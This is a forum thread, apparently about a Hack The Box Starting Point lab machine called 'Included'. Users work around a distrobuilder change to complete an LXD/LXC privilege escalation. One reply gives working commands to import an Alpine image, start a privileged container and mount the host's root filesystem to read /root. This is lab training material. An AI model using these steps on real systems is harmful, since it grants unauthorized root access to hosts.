Starting Point - Included - LXD Support Removed

herczanzibar · June 6, 2024, 9:13pm

For the Starting Point “Included” machine, I’m at the LXD portion. Well, unfortunately, it seems that distrobuilder removed LXD support literally last week.

GitHub - lxc/distrobuilder: System container image builder for LXC and Incus, pr 854

The rub is that there is no more lxd-build command. I tried with lxc-build, but it builds different files, at least by name, but I can’t perform a wget on them from Mike’s shell: Permission Denied. I tried chmod’ing them locally—I went full 777—but I still get Permission Denied on the wget from Mike’s shell.

Any thoughts?

Thanks!
-Herc

W177 · June 7, 2024, 7:52pm

I’m experiencing the exact same thing. I’ve been through all of the starting point machines, now and again to stay sharp, but I’m on my way through again and this is happening. I assume updates of some kind? If this is the case, user Mike is toast. Unless you upload Linpeas and take a gander…? Good luck, amigo! Do respond here, if you find a workaround and I’ll do the same!! Thanks!:

W177 · June 7, 2024, 8:32pm

I used this and was successful in nabbing root.

git clone GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD
cd lxd-alpine-builder
./build-alpine

Then, upload the .gz file it produces to Mike’s machine.

lxc image import ./yourfile.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true

Now, mount the root image:

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Then, take a gander inside /mnt/root/root

Wooo!

bsnun · June 7, 2024, 8:40pm

There’s a HackTricks for LXD/LXC privesc.
There are a couple of ways for getting root access to a container there.

Enjoy!

dragonguy · August 29, 2024, 4:40pm

I used the following command to build the image:
sudo ~/go/bin/distrobuilder build-incus alpine.yaml -o image.release=3.18

The output produced incus.tar.xz and rootfs.squashfs which I can use them to image import onto the remote server.

cultdeadcow · August 30, 2024, 4:26pm

Many thanks W177, but can you elaborate at all?

I’ve managed to upload the .gz file (alpine-v3.13-x86_64-20210218_0139.tar.gz)

But when I try to set the security.privileged flag to true i get

mike@included:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
Error: Unsupported compression

Not sure where I’ve gone wrong

W177 · August 31, 2024, 3:31pm

The “Unsupported compression” error usually indicates that the system cannot decompress the container image.
It could be missing compression libraries or maybe incompatible LXC version. Not sure without more detail. Did ya get this one cracked yet?

JoeyOnline · September 9, 2024, 3:41pm

Hi. This worked like a dream, thank you!

MechantMechant · November 14, 2024, 12:10pm

You are the best, Thanks!. bisous from France.

BennyDee · November 16, 2024, 1:15pm

You can find older distrobuilder images here: Linux Containers - distrobuilder - Downloads

For me 3.0 was sufficient just use rootfs.squashfs and incus.tar.xz, this will work out for this machine.

Using build-incus did not work out for me on 3.1, since its missing the rootfs.

The Alpine Builder did not work out for me.